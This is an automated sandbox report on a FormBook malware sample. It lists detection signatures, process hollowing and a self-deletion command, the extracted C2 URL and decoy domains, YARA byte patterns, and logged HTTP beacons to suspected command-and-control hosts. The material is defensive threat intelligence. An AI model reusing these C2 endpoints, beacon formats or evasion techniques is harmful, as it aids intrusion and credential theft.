Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5tCYPTkM6b.exe

Overview

General Information

Sample Name:5tCYPTkM6b.exe
Analysis ID:562034
MD5:c2ca2ba9c38eb02217588662717ba6c3
SHA1:8a897f24d2e564af2c2fcc272ab0cfbef10611b5
SHA256:9af4d9ef8b2a850854ae23411d44d3603147c26898bca1010fd2f9b16f6d456e
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • 5tCYPTkM6b.exe (PID: 4904 cmdline: "C:\Users\user\Desktop\5tCYPTkM6b.exe" MD5: C2CA2BA9C38EB02217588662717BA6C3)
    • 5tCYPTkM6b.exe (PID: 5880 cmdline: "C:\Users\user\Desktop\5tCYPTkM6b.exe" MD5: C2CA2BA9C38EB02217588662717BA6C3)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6980 cmdline: /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.5tCYPTkM6b.exe.2300000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.5tCYPTkM6b.exe.2300000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.5tCYPTkM6b.exe.2300000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        2.0.5tCYPTkM6b.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.0.5tCYPTkM6b.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}
          Multi AV Scanner detection for submitted file
          Source: 5tCYPTkM6b.exeVirustotal: Detection: 39%Perma Link
          Source: 5tCYPTkM6b.exeReversingLabs: Detection: 34%
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.yixuan5.com/b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9Avira URL Cloud: Label: malware
          Source: http://www.farmacymerchants.com/b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9Avira URL Cloud: Label: malware
          Source: www.dreamschools.online/b80i/Avira URL Cloud: Label: phishing
          Source: http://www.carriewilliamsinc.com/b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9Avira URL Cloud: Label: malware
          Source: http://www.gooooooo.xyz/b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9Avira URL Cloud: Label: phishing
          Machine Learning detection for sample
          Source: 5tCYPTkM6b.exeJoe Sandbox ML: detected
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.2.control.exe.486796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.0.5tCYPTkM6b.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 2.0.5tCYPTkM6b.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.5tCYPTkM6b.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.5tCYPTkM6b.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 14.2.control.exe.53aa88.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.0.5tCYPTkM6b.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 2.0.5tCYPTkM6b.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 2.2.5tCYPTkM6b.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.5tCYPTkM6b.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5tCYPTkM6b.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: 5tCYPTkM6b.exe, 00000000.00000003.267437661.000000001B0B0000.00000004.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000000.00000003.264871766.000000001AF20000.00000004.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332546161.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000003.334008082.0000000004190000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524788773.000000000444F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524438150.0000000004330000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: 5tCYPTkM6b.exe, 00000002.00000002.332518293.0000000000950000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 5tCYPTkM6b.exe, 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332546161.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, control.exe, control.exe, 0000000E.00000003.334008082.0000000004190000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524788773.000000000444F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524438150.0000000004330000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: 5tCYPTkM6b.exe, 00000002.00000002.332518293.0000000000950000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.gooooooo.xyz
          Source: C:\Windows\explorer.exeDomain query: www.carriewilliamsinc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 148.72.244.75 80
          Source: C:\Windows\explorer.exeDomain query: www.yixuan5.com
          Source: C:\Windows\explorer.exeDomain query: www.inslidr.com
          Source: C:\Windows\explorer.exeDomain query: www.farmacymerchants.com
          Source: C:\Windows\explorer.exeNetwork Connect: 156.246.248.162 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.gooooooo.xyz
          Source: DNS query: www.postmoon.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.dreamschools.online/b80i/
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: Africa-on-Cloud-ASZA Africa-on-Cloud-ASZA
          Source: global trafficHTTP traffic detected: GET /b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9 HTTP/1.1Host: www.carriewilliamsinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9 HTTP/1.1Host: www.gooooooo.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9 HTTP/1.1Host: www.yixuan5.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9 HTTP/1.1Host: www.farmacymerchants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 09:47:39 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f281b6-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 09:47:44 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Fri, 28 Jan 2022 09:47:47 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 